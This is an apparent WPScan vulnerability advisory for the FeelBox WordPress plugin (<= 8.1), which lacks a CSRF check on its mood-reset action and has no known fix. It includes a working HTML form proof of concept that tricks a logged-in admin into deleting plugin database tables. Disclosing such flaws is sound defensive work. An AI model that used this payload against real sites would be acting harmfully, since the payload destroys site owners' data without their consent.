WordPress Plugin Vulnerabilities

FL3R FeelBox <= 8.1 - Moods Reset via CSRF

Description

The plugin does not have CSRF check when updating reseting moods which could allow attackers to make logged in admins perform such action via a CSRF attack and delete the lydl_posts & lydl_poststimestamp DB tables

Proof of Concept

Make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/options-general.php?page=feelbox" method="POST">
    <input type="text" name="feelbox_submit_hidden" value="Y">
    <input type="text" name="cleardata" value="DELETE">
    <input type="submit" name="submit" value="submit">
</form>

Affects Plugins

No known fix

References

Classification

Miscellaneous

Original Researcher
WPScan
Verified
Yes

Timeline

Publicly Published
2023-01-04 (about 1 years ago)
Added
2023-01-04 (about 1 years ago)
Last Updated
2023-01-04 (about 1 years ago)

Other